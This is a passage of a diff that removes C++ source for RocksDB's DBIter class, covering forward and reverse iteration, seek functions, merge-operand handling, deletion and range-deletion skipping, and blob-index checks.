-void DBIter::Next() {
-  assert(valid_);
-
-  // Release temporarily pinned blocks from last operation
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  if (direction_ == kReverse) {
-    ReverseToForward();
-  } else if (iter_->Valid() && !current_entry_is_merged_) {
-    // If the current value is not a merge, the iter position is the
-    // current key, which is already returned. We can safely issue a
-    // Next() without checking the current key.
-    // If the current key is a merge, very likely iter already points
-    // to the next internal position.
-    iter_->Next();
-    PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-  }
-
-  if (statistics_ != nullptr) {
-    local_stats_.next_count_++;
-  }
-  // Now we point to the next internal position, for both of merge and
-  // not merge cases.
-  if (!iter_->Valid()) {
-    valid_ = false;
-    return;
-  }
-  FindNextUserEntry(true /* skipping the current user key */, prefix_same_as_start_);
-  if (statistics_ != nullptr && valid_) {
-    local_stats_.next_found_count_++;
-    local_stats_.bytes_read_ += (key().size() + value().size());
-  }
-}
-
-// PRE: saved_key_ has the current user key if skipping
-// POST: saved_key_ should have the next user key if valid_,
-//       if the current entry is a result of merge
-//           current_entry_is_merged_ => true
-//           saved_value_             => the merged value
-//
-// NOTE: In between, saved_key_ can point to a user key that has
-//       a delete marker or a sequence number higher than sequence_
-//       saved_key_ MUST have a proper user_key before calling this function
-//
-// The prefix_check parameter controls whether we check the iterated
-// keys against the prefix of the seeked key. Set to false when
-// performing a seek without a key (e.g. SeekToFirst). Set to
-// prefix_same_as_start_ for other iterations.
-inline void DBIter::FindNextUserEntry(bool skipping, bool prefix_check) {
-  PERF_TIMER_GUARD(find_next_user_entry_time);
-  FindNextUserEntryInternal(skipping, prefix_check);
-}
-
-// Actual implementation of DBIter::FindNextUserEntry()
-void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) {
-  // Loop until we hit an acceptable entry to yield
-  assert(iter_->Valid());
-  assert(direction_ == kForward);
-  current_entry_is_merged_ = false;
-
-  // How many times in a row we have skipped an entry with user key less than
-  // or equal to saved_key_. We could skip these entries either because
-  // sequence numbers were too high or because skipping = true.
-  // What saved_key_ contains throughout this method:
-  //  - if skipping        : saved_key_ contains the key that we need to skip,
-  //                         and we haven't seen any keys greater than that,
-  //  - if num_skipped > 0 : saved_key_ contains the key that we have skipped
-  //                         num_skipped times, and we haven't seen any keys
-  //                         greater than that,
-  //  - none of the above  : saved_key_ can contain anything, it doesn't matter.
-  uint64_t num_skipped = 0;
-
-  is_blob_ = false;
-
-  do {
-    ParsedInternalKey ikey;
-
-    if (!ParseKey(&ikey)) {
-      // Skip corrupted keys.
-      iter_->Next();
-      continue;
-    }
-
-    if (iterate_upper_bound_ != nullptr &&
-        user_comparator_->Compare(ikey.user_key, *iterate_upper_bound_) >= 0) {
-      break;
-    }
-
-    if (prefix_extractor_ && prefix_check &&
-        prefix_extractor_->Transform(ikey.user_key)
-          .compare(prefix_start_key_) != 0) {
-      break;
-    }
-
-    if (TooManyInternalKeysSkipped()) {
-      return;
-    }
-
-    if (ikey.sequence <= sequence_) {
-      if (skipping &&
-          user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) <=
-              0) {
-        num_skipped++;  // skip this entry
-        PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-      } else {
-        num_skipped = 0;
-        switch (ikey.type) {
-          case kTypeDeletion:
-          case kTypeSingleDeletion:
-            // Arrange to skip all upcoming entries for this key since
-            // they are hidden by this deletion.
-            saved_key_.SetUserKey(
-                ikey.user_key,
-                !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-            skipping = true;
-            PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-            break;
-          case kTypeValue:
-          case kTypeBlobIndex:
-            saved_key_.SetUserKey(
-                ikey.user_key,
-                !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-            if (range_del_agg_.ShouldDelete(
-                    ikey, RangeDelAggregator::RangePositioningMode::
-                              kForwardTraversal)) {
-              // Arrange to skip all upcoming entries for this key since
-              // they are hidden by this deletion.
-              skipping = true;
-              num_skipped = 0;
-              PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-            } else if (ikey.type == kTypeBlobIndex) {
-              if (!allow_blob_) {
-                ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-                status_ = Status::NotSupported(
-                    "Encounter unexpected blob index. Please open DB with "
-                    "rocksdb::blob_db::BlobDB instead.");
-                valid_ = false;
-              } else {
-                is_blob_ = true;
-                valid_ = true;
-              }
-              return;
-            } else {
-              valid_ = true;
-              return;
-            }
-            break;
-          case kTypeMerge:
-            saved_key_.SetUserKey(
-                ikey.user_key,
-                !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-            if (range_del_agg_.ShouldDelete(
-                    ikey, RangeDelAggregator::RangePositioningMode::
-                              kForwardTraversal)) {
-              // Arrange to skip all upcoming entries for this key since
-              // they are hidden by this deletion.
-              skipping = true;
-              num_skipped = 0;
-              PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-            } else {
-              // By now, we are sure the current ikey is going to yield a
-              // value
-              current_entry_is_merged_ = true;
-              valid_ = true;
-              MergeValuesNewToOld();  // Go to a different state machine
-              return;
-            }
-            break;
-          default:
-            assert(false);
-            break;
-        }
-      }
-    } else {
-      // This key was inserted after our snapshot was taken.
-      PERF_COUNTER_ADD(internal_recent_skipped_count, 1);
-
-      // Here saved_key_ may contain some old key, or the default empty key, or
-      // key assigned by some random other method. We don't care.
-      if (user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) <=
-          0) {
-        num_skipped++;
-      } else {
-        saved_key_.SetUserKey(
-            ikey.user_key,
-            !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-        skipping = false;
-        num_skipped = 0;
-      }
-    }
-
-    // If we have sequentially iterated via numerous equal keys, then it's
-    // better to seek so that we can avoid too many key comparisons.
-    if (num_skipped > max_skip_) {
-      num_skipped = 0;
-      std::string last_key;
-      if (skipping) {
-        // We're looking for the next user-key but all we see are the same
-        // user-key with decreasing sequence numbers. Fast forward to
-        // sequence number 0 and type deletion (the smallest type).
-        AppendInternalKey(&last_key, ParsedInternalKey(saved_key_.GetUserKey(),
-                                                       0, kTypeDeletion));
-        // Don't set skipping = false because we may still see more user-keys
-        // equal to saved_key_.
-      } else {
-        // We saw multiple entries with this user key and sequence numbers
-        // higher than sequence_. Fast forward to sequence_.
-        // Note that this only covers a case when a higher key was overwritten
-        // many times since our snapshot was taken, not the case when a lot of
-        // different keys were inserted after our snapshot was taken.
-        AppendInternalKey(&last_key,
-                          ParsedInternalKey(saved_key_.GetUserKey(), sequence_,
-                                            kValueTypeForSeek));
-      }
-      iter_->Seek(last_key);
-      RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-    } else {
-      iter_->Next();
-    }
-  } while (iter_->Valid());
-  valid_ = false;
-}
-
-// Merge values of the same user key starting from the current iter_ position
-// Scan from the newer entries to older entries.
-// PRE: iter_->key() points to the first merge type entry
-//      saved_key_ stores the user key
-// POST: saved_value_ has the merged value for the user key
-//       iter_ points to the next entry (or invalid)
-void DBIter::MergeValuesNewToOld() {
-  if (!merge_operator_) {
-    ROCKS_LOG_ERROR(logger_, "Options::merge_operator is null.");
-    status_ = Status::InvalidArgument("merge_operator_ must be set.");
-    valid_ = false;
-    return;
-  }
-
-  // Temporarily pin the blocks that hold merge operands
-  TempPinData();
-  merge_context_.Clear();
-  // Start the merge process by pushing the first operand
-  merge_context_.PushOperand(iter_->value(),
-                             iter_->IsValuePinned() /* operand_pinned */);
-
-  ParsedInternalKey ikey;
-  Status s;
-  for (iter_->Next(); iter_->Valid(); iter_->Next()) {
-    if (!ParseKey(&ikey)) {
-      // skip corrupted key
-      continue;
-    }
-
-    if (!user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-      // hit the next user key, stop right here
-      break;
-    } else if (kTypeDeletion == ikey.type || kTypeSingleDeletion == ikey.type ||
-               range_del_agg_.ShouldDelete(
-                   ikey, RangeDelAggregator::RangePositioningMode::
-                             kForwardTraversal)) {
-      // hit a delete with the same user key, stop right here
-      // iter_ is positioned after delete
-      iter_->Next();
-      break;
-    } else if (kTypeValue == ikey.type) {
-      // hit a put, merge the put value with operands and store the
-      // final result in saved_value_. We are done!
-      // ignore corruption if there is any.
-      const Slice val = iter_->value();
-      s = MergeHelper::TimedFullMerge(
-          merge_operator_, ikey.user_key, &val, merge_context_.GetOperands(),
-          &saved_value_, logger_, statistics_, env_, &pinned_value_, true);
-      if (!s.ok()) {
-        status_ = s;
-      }
-      // iter_ is positioned after put
-      iter_->Next();
-      return;
-    } else if (kTypeMerge == ikey.type) {
-      // hit a merge, add the value as an operand and run associative merge.
-      // when complete, add result to operands and continue.
-      merge_context_.PushOperand(iter_->value(),
-                                 iter_->IsValuePinned() /* operand_pinned */);
-      PERF_COUNTER_ADD(internal_merge_count, 1);
-    } else if (kTypeBlobIndex == ikey.type) {
-      if (!allow_blob_) {
-        ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-        status_ = Status::NotSupported(
-            "Encounter unexpected blob index. Please open DB with "
-            "rocksdb::blob_db::BlobDB instead.");
-      } else {
-        status_ =
-            Status::NotSupported("Blob DB does not support merge operator.");
-      }
-      valid_ = false;
-      return;
-    } else {
-      assert(false);
-    }
-  }
-
-  // we either exhausted all internal keys under this user key, or hit
-  // a deletion marker.
-  // feed null as the existing value to the merge operator, such that
-  // client can differentiate this scenario and do things accordingly.
-  s = MergeHelper::TimedFullMerge(merge_operator_, saved_key_.GetUserKey(),
-                                  nullptr, merge_context_.GetOperands(),
-                                  &saved_value_, logger_, statistics_, env_,
-                                  &pinned_value_, true);
-  if (!s.ok()) {
-    status_ = s;
-  }
-}
-
-void DBIter::Prev() {
-  assert(valid_);
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  if (direction_ == kForward) {
-    ReverseToBackward();
-  }
-  PrevInternal();
-  if (statistics_ != nullptr) {
-    local_stats_.prev_count_++;
-    if (valid_) {
-      local_stats_.prev_found_count_++;
-      local_stats_.bytes_read_ += (key().size() + value().size());
-    }
-  }
-}
-
-void DBIter::ReverseToForward() {
-  if (prefix_extractor_ != nullptr && !total_order_seek_) {
-    IterKey last_key;
-    last_key.SetInternalKey(ParsedInternalKey(
-        saved_key_.GetUserKey(), kMaxSequenceNumber, kValueTypeForSeek));
-    iter_->Seek(last_key.GetInternalKey());
-  }
-  FindNextUserKey();
-  direction_ = kForward;
-  if (!iter_->Valid()) {
-    iter_->SeekToFirst();
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-}
-
-void DBIter::ReverseToBackward() {
-  if (prefix_extractor_ != nullptr && !total_order_seek_) {
-    IterKey last_key;
-    last_key.SetInternalKey(ParsedInternalKey(saved_key_.GetUserKey(), 0,
-                                              kValueTypeForSeekForPrev));
-    iter_->SeekForPrev(last_key.GetInternalKey());
-  }
-  if (current_entry_is_merged_) {
-    // Not placed in the same key. Need to call Prev() until finding the
-    // previous key.
-    if (!iter_->Valid()) {
-      iter_->SeekToLast();
-      range_del_agg_.InvalidateTombstoneMapPositions();
-    }
-    ParsedInternalKey ikey;
-    FindParseableKey(&ikey, kReverse);
-    while (iter_->Valid() &&
-           user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) >
-               0) {
-      assert(ikey.sequence != kMaxSequenceNumber);
-      if (ikey.sequence > sequence_) {
-        PERF_COUNTER_ADD(internal_recent_skipped_count, 1);
-      } else {
-        PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-      }
-      iter_->Prev();
-      FindParseableKey(&ikey, kReverse);
-    }
-  }
-#ifndef NDEBUG
-  if (iter_->Valid()) {
-    ParsedInternalKey ikey;
-    assert(ParseKey(&ikey));
-    assert(user_comparator_->Compare(ikey.user_key, saved_key_.GetUserKey()) <=
-           0);
-  }
-#endif
-
-  FindPrevUserKey();
-  direction_ = kReverse;
-}
-
-void DBIter::PrevInternal() {
-  if (!iter_->Valid()) {
-    valid_ = false;
-    return;
-  }
-
-  ParsedInternalKey ikey;
-
-  while (iter_->Valid()) {
-    saved_key_.SetUserKey(
-        ExtractUserKey(iter_->key()),
-        !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-
-    if (FindValueForCurrentKey()) {
-      if (!iter_->Valid()) {
-        return;
-      }
-      FindParseableKey(&ikey, kReverse);
-      if (user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-        FindPrevUserKey();
-      }
-      if (valid_ && prefix_extractor_ && prefix_same_as_start_ &&
-          prefix_extractor_->Transform(saved_key_.GetUserKey())
-                  .compare(prefix_start_key_) != 0) {
-        valid_ = false;
-      }
-      return;
-    }
-
-    if (TooManyInternalKeysSkipped(false)) {
-      return;
-    }
-
-    if (!iter_->Valid()) {
-      break;
-    }
-    FindParseableKey(&ikey, kReverse);
-    if (user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-      FindPrevUserKey();
-    }
-  }
-  // We haven't found any key - iterator is not valid
-  // Or the prefix is different than start prefix
-  assert(!iter_->Valid());
-  valid_ = false;
-}
-
-// This function checks, if the entry with biggest sequence_number <= sequence_
-// is non kTypeDeletion or kTypeSingleDeletion. If it's not, we save value in
-// saved_value_
-bool DBIter::FindValueForCurrentKey() {
-  assert(iter_->Valid());
-  merge_context_.Clear();
-  current_entry_is_merged_ = false;
-  // last entry before merge (could be kTypeDeletion, kTypeSingleDeletion or
-  // kTypeValue)
-  ValueType last_not_merge_type = kTypeDeletion;
-  ValueType last_key_entry_type = kTypeDeletion;
-
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kReverse);
-
-  // Temporarily pin blocks that hold (merge operands / the value)
-  ReleaseTempPinnedData();
-  TempPinData();
-  size_t num_skipped = 0;
-  while (iter_->Valid() && ikey.sequence <= sequence_ &&
-         user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-    if (TooManyInternalKeysSkipped()) {
-      return false;
-    }
-
-    // We iterate too much: let's use Seek() to avoid too much key comparisons
-    if (num_skipped >= max_skip_) {
-      return FindValueForCurrentKeyUsingSeek();
-    }
-
-    last_key_entry_type = ikey.type;
-    switch (last_key_entry_type) {
-      case kTypeValue:
-      case kTypeBlobIndex:
-        if (range_del_agg_.ShouldDelete(
-                ikey,
-                RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-          last_key_entry_type = kTypeRangeDeletion;
-          PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-        } else {
-          assert(iter_->IsValuePinned());
-          pinned_value_ = iter_->value();
-        }
-        merge_context_.Clear();
-        last_not_merge_type = last_key_entry_type;
-        break;
-      case kTypeDeletion:
-      case kTypeSingleDeletion:
-        merge_context_.Clear();
-        last_not_merge_type = last_key_entry_type;
-        PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-        break;
-      case kTypeMerge:
-        if (range_del_agg_.ShouldDelete(
-                ikey,
-                RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-          merge_context_.Clear();
-          last_key_entry_type = kTypeRangeDeletion;
-          last_not_merge_type = last_key_entry_type;
-          PERF_COUNTER_ADD(internal_delete_skipped_count, 1);
-        } else {
-          assert(merge_operator_ != nullptr);
-          merge_context_.PushOperandBack(
-              iter_->value(), iter_->IsValuePinned() /* operand_pinned */);
-          PERF_COUNTER_ADD(internal_merge_count, 1);
-        }
-        break;
-      default:
-        assert(false);
-    }
-
-    PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-    assert(user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey()));
-    iter_->Prev();
-    ++num_skipped;
-    FindParseableKey(&ikey, kReverse);
-  }
-
-  Status s;
-  is_blob_ = false;
-  switch (last_key_entry_type) {
-    case kTypeDeletion:
-    case kTypeSingleDeletion:
-    case kTypeRangeDeletion:
-      valid_ = false;
-      return false;
-    case kTypeMerge:
-      current_entry_is_merged_ = true;
-      if (last_not_merge_type == kTypeDeletion ||
-          last_not_merge_type == kTypeSingleDeletion ||
-          last_not_merge_type == kTypeRangeDeletion) {
-        s = MergeHelper::TimedFullMerge(
-            merge_operator_, saved_key_.GetUserKey(), nullptr,
-            merge_context_.GetOperands(), &saved_value_, logger_, statistics_,
-            env_, &pinned_value_, true);
-      } else if (last_not_merge_type == kTypeBlobIndex) {
-        if (!allow_blob_) {
-          ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-          status_ = Status::NotSupported(
-              "Encounter unexpected blob index. Please open DB with "
-              "rocksdb::blob_db::BlobDB instead.");
-        } else {
-          status_ =
-              Status::NotSupported("Blob DB does not support merge operator.");
-        }
-        valid_ = false;
-        return true;
-      } else {
-        assert(last_not_merge_type == kTypeValue);
-        s = MergeHelper::TimedFullMerge(
-            merge_operator_, saved_key_.GetUserKey(), &pinned_value_,
-            merge_context_.GetOperands(), &saved_value_, logger_, statistics_,
-            env_, &pinned_value_, true);
-      }
-      break;
-    case kTypeValue:
-      // do nothing - we've already has value in saved_value_
-      break;
-    case kTypeBlobIndex:
-      if (!allow_blob_) {
-        ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-        status_ = Status::NotSupported(
-            "Encounter unexpected blob index. Please open DB with "
-            "rocksdb::blob_db::BlobDB instead.");
-        valid_ = false;
-        return true;
-      }
-      is_blob_ = true;
-      break;
-    default:
-      assert(false);
-      break;
-  }
-  valid_ = true;
-  if (!s.ok()) {
-    status_ = s;
-  }
-  return true;
-}
-
-// This function is used in FindValueForCurrentKey.
-// We use Seek() function instead of Prev() to find necessary value
-bool DBIter::FindValueForCurrentKeyUsingSeek() {
-  // FindValueForCurrentKey will enable pinning before calling
-  // FindValueForCurrentKeyUsingSeek()
-  assert(pinned_iters_mgr_.PinningEnabled());
-  std::string last_key;
-  AppendInternalKey(&last_key, ParsedInternalKey(saved_key_.GetUserKey(),
-                                                 sequence_, kValueTypeForSeek));
-  iter_->Seek(last_key);
-  RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-
-  // assume there is at least one parseable key for this user key
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kForward);
-
-  if (ikey.type == kTypeDeletion || ikey.type == kTypeSingleDeletion ||
-      range_del_agg_.ShouldDelete(
-          ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-    valid_ = false;
-    return false;
-  }
-  if (ikey.type == kTypeBlobIndex && !allow_blob_) {
-    ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index.");
-    status_ = Status::NotSupported(
-        "Encounter unexpected blob index. Please open DB with "
-        "rocksdb::blob_db::BlobDB instead.");
-    valid_ = false;
-    return true;
-  }
-  if (ikey.type == kTypeValue || ikey.type == kTypeBlobIndex) {
-    assert(iter_->IsValuePinned());
-    pinned_value_ = iter_->value();
-    valid_ = true;
-    return true;
-  }
-
-  // kTypeMerge. We need to collect all kTypeMerge values and save them
-  // in operands
-  current_entry_is_merged_ = true;
-  merge_context_.Clear();
-  while (
-      iter_->Valid() &&
-      user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey()) &&
-      ikey.type == kTypeMerge &&
-      !range_del_agg_.ShouldDelete(
-          ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-    merge_context_.PushOperand(iter_->value(),
-                               iter_->IsValuePinned() /* operand_pinned */);
-    PERF_COUNTER_ADD(internal_merge_count, 1);
-    iter_->Next();
-    FindParseableKey(&ikey, kForward);
-  }
-
-  Status s;
-  if (!iter_->Valid() ||
-      !user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey()) ||
-      ikey.type == kTypeDeletion || ikey.type == kTypeSingleDeletion ||
-      range_del_agg_.ShouldDelete(
-          ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) {
-    s = MergeHelper::TimedFullMerge(merge_operator_, saved_key_.GetUserKey(),
-                                    nullptr, merge_context_.GetOperands(),
-                                    &saved_value_, logger_, statistics_, env_,
-                                    &pinned_value_, true);
-    // Make iter_ valid and point to saved_key_
-    if (!iter_->Valid() ||
-        !user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-      iter_->Seek(last_key);
-      RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-    }
-    valid_ = true;
-    if (!s.ok()) {
-      status_ = s;
-    }
-    return true;
-  }
-
-  const Slice& val = iter_->value();
-  s = MergeHelper::TimedFullMerge(merge_operator_, saved_key_.GetUserKey(),
-                                  &val, merge_context_.GetOperands(),
-                                  &saved_value_, logger_, statistics_, env_,
-                                  &pinned_value_, true);
-  valid_ = true;
-  if (!s.ok()) {
-    status_ = s;
-  }
-  return true;
-}
-
-// Used in Next to change directions
-// Go to next user key
-// Don't use Seek(),
-// because next user key will be very close
-void DBIter::FindNextUserKey() {
-  if (!iter_->Valid()) {
-    return;
-  }
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kForward);
-  while (iter_->Valid() &&
-         !user_comparator_->Equal(ikey.user_key, saved_key_.GetUserKey())) {
-    iter_->Next();
-    FindParseableKey(&ikey, kForward);
-  }
-}
-
-// Go to previous user_key
-void DBIter::FindPrevUserKey() {
-  if (!iter_->Valid()) {
-    return;
-  }
-  size_t num_skipped = 0;
-  ParsedInternalKey ikey;
-  FindParseableKey(&ikey, kReverse);
-  int cmp;
-  while (iter_->Valid() &&
-         ((cmp = user_comparator_->Compare(ikey.user_key,
-                                           saved_key_.GetUserKey())) == 0 ||
-          (cmp > 0 && ikey.sequence > sequence_))) {
-    if (TooManyInternalKeysSkipped()) {
-      return;
-    }
-
-    if (cmp == 0) {
-      if (num_skipped >= max_skip_) {
-        num_skipped = 0;
-        IterKey last_key;
-        last_key.SetInternalKey(ParsedInternalKey(
-            saved_key_.GetUserKey(), kMaxSequenceNumber, kValueTypeForSeek));
-        iter_->Seek(last_key.GetInternalKey());
-        RecordTick(statistics_, NUMBER_OF_RESEEKS_IN_ITERATION);
-      } else {
-        ++num_skipped;
-      }
-    }
-    assert(ikey.sequence != kMaxSequenceNumber);
-    if (ikey.sequence > sequence_) {
-      PERF_COUNTER_ADD(internal_recent_skipped_count, 1);
-    } else {
-      PERF_COUNTER_ADD(internal_key_skipped_count, 1);
-    }
-    iter_->Prev();
-    FindParseableKey(&ikey, kReverse);
-  }
-}
-
-bool DBIter::TooManyInternalKeysSkipped(bool increment) {
-  if ((max_skippable_internal_keys_ > 0) &&
-      (num_internal_keys_skipped_ > max_skippable_internal_keys_)) {
-    valid_ = false;
-    status_ = Status::Incomplete("Too many internal keys skipped.");
-    return true;
-  } else if (increment) {
-    num_internal_keys_skipped_++;
-  }
-  return false;
-}
-
-// Skip all unparseable keys
-void DBIter::FindParseableKey(ParsedInternalKey* ikey, Direction direction) {
-  while (iter_->Valid() && !ParseKey(ikey)) {
-    if (direction == kReverse) {
-      iter_->Prev();
-    } else {
-      iter_->Next();
-    }
-  }
-}
-
-void DBIter::Seek(const Slice& target) {
-  StopWatch sw(env_, statistics_, DB_SEEK);
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  saved_key_.Clear();
-  saved_key_.SetInternalKey(target, sequence_);
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->Seek(saved_key_.GetInternalKey());
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-  RecordTick(statistics_, NUMBER_DB_SEEK);
-  if (iter_->Valid()) {
-    if (prefix_extractor_ && prefix_same_as_start_) {
-      prefix_start_key_ = prefix_extractor_->Transform(target);
-    }
-    direction_ = kForward;
-    ClearSavedValue();
-    FindNextUserEntry(false /* not skipping */, prefix_same_as_start_);
-    if (!valid_) {
-      prefix_start_key_.clear();
-    }
-    if (statistics_ != nullptr) {
-      if (valid_) {
-        RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-        RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-        PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-      }
-    }
-  } else {
-    valid_ = false;
-  }
-
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(prefix_start_key_);
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-void DBIter::SeekForPrev(const Slice& target) {
-  StopWatch sw(env_, statistics_, DB_SEEK);
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  saved_key_.Clear();
-  // now saved_key is used to store internal key.
-  saved_key_.SetInternalKey(target, 0 /* sequence_number */,
-                            kValueTypeForSeekForPrev);
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->SeekForPrev(saved_key_.GetInternalKey());
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-
-  RecordTick(statistics_, NUMBER_DB_SEEK);
-  if (iter_->Valid()) {
-    if (prefix_extractor_ && prefix_same_as_start_) {
-      prefix_start_key_ = prefix_extractor_->Transform(target);
-    }
-    direction_ = kReverse;
-    ClearSavedValue();
-    PrevInternal();
-    if (!valid_) {
-      prefix_start_key_.clear();
-    }
-    if (statistics_ != nullptr) {
-      if (valid_) {
-        RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-        RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-        PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-      }
-    }
-  } else {
-    valid_ = false;
-  }
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(prefix_start_key_);
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-void DBIter::SeekToFirst() {
-  // Don't use iter_::Seek() if we set a prefix extractor
-  // because prefix seek will be used.
-  if (prefix_extractor_ != nullptr) {
-    max_skip_ = std::numeric_limits<uint64_t>::max();
-  }
-  direction_ = kForward;
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  ClearSavedValue();
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->SeekToFirst();
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-
-  RecordTick(statistics_, NUMBER_DB_SEEK);
-  if (iter_->Valid()) {
-    saved_key_.SetUserKey(
-        ExtractUserKey(iter_->key()),
-        !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */);
-    FindNextUserEntry(false /* not skipping */, false /* no prefix check */);
-    if (statistics_ != nullptr) {
-      if (valid_) {
-        RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-        RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-        PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-      }
-    }
-  } else {
-    valid_ = false;
-  }
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(
-        prefix_extractor_->Transform(saved_key_.GetUserKey()));
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-void DBIter::SeekToLast() {
-  // Don't use iter_::Seek() if we set a prefix extractor
-  // because prefix seek will be used.
-  if (prefix_extractor_ != nullptr) {
-    max_skip_ = std::numeric_limits<uint64_t>::max();
-  }
-  direction_ = kReverse;
-  ReleaseTempPinnedData();
-  ResetInternalKeysSkippedCounter();
-  ClearSavedValue();
-
-  {
-    PERF_TIMER_GUARD(seek_internal_seek_time);
-    iter_->SeekToLast();
-    range_del_agg_.InvalidateTombstoneMapPositions();
-  }
-  // When the iterate_upper_bound is set to a value,
-  // it will seek to the last key before the
-  // ReadOptions.iterate_upper_bound
-  if (iter_->Valid() && iterate_upper_bound_ != nullptr) {
-    SeekForPrev(*iterate_upper_bound_);
-    range_del_agg_.InvalidateTombstoneMapPositions();
-    if (!Valid()) {
-      return;
-    } else if (user_comparator_->Equal(*iterate_upper_bound_, key())) {
-      Prev();
-    }
-  } else {
-    PrevInternal();
-  }
-  if (statistics_ != nullptr) {
-    RecordTick(statistics_, NUMBER_DB_SEEK);
-    if (valid_) {
-      RecordTick(statistics_, NUMBER_DB_SEEK_FOUND);
-      RecordTick(statistics_, ITER_BYTES_READ, key().size() + value().size());
-      PERF_COUNTER_ADD(iter_read_bytes, key().size() + value().size());
-    }
-  }
-  if (valid_ && prefix_extractor_ && prefix_same_as_start_) {
-    prefix_start_buf_.SetUserKey(
-        prefix_extractor_->Transform(saved_key_.GetUserKey()));
-    prefix_start_key_ = prefix_start_buf_.GetUserKey();
-  }
-}
-
-Iterator* NewDBIterator(Env* env, const ReadOptions& read_options,
-                        const ImmutableCFOptions& cf_options,
-                        const Comparator* user_key_comparator,
-                        InternalIterator* internal_iter,
-                        const SequenceNumber& sequence,
-                        uint64_t max_sequential_skip_in_iterations,
-                        bool allow_blob) {
-  DBIter* db_iter = new DBIter(
-      env, read_options, cf_options, user_key_comparator, internal_iter,
-      sequence, false, max_sequential_skip_in_iterations, allow_blob);
-  return db_iter;
-}
-
-ArenaWrappedDBIter::~ArenaWrappedDBIter() { db_iter_->~DBIter(); }
-
-RangeDelAggregator* ArenaWrappedDBIter::GetRangeDelAggregator() {
-  return db_iter_->GetRangeDelAggregator();
-}
-
-void ArenaWrappedDBIter::SetIterUnderDBIter(InternalIterator* iter) {
-  static_cast<DBIter*>(db_iter_)->SetIter(iter);
-}
-
-inline bool ArenaWrappedDBIter::Valid() const { return db_iter_->Valid(); }
-inline void ArenaWrappedDBIter::SeekToFirst() { db_iter_->SeekToFirst(); }
-inline void ArenaWrappedDBIter::SeekToLast() { db_iter_->SeekToLast(); }
-inline void ArenaWrappedDBIter::Seek(const Slice& target) {
-  db_iter_->Seek(target);
-}
-inline void ArenaWrappedDBIter::SeekForPrev(const Slice& target) {
-  db_iter_->SeekForPrev(target);
-}
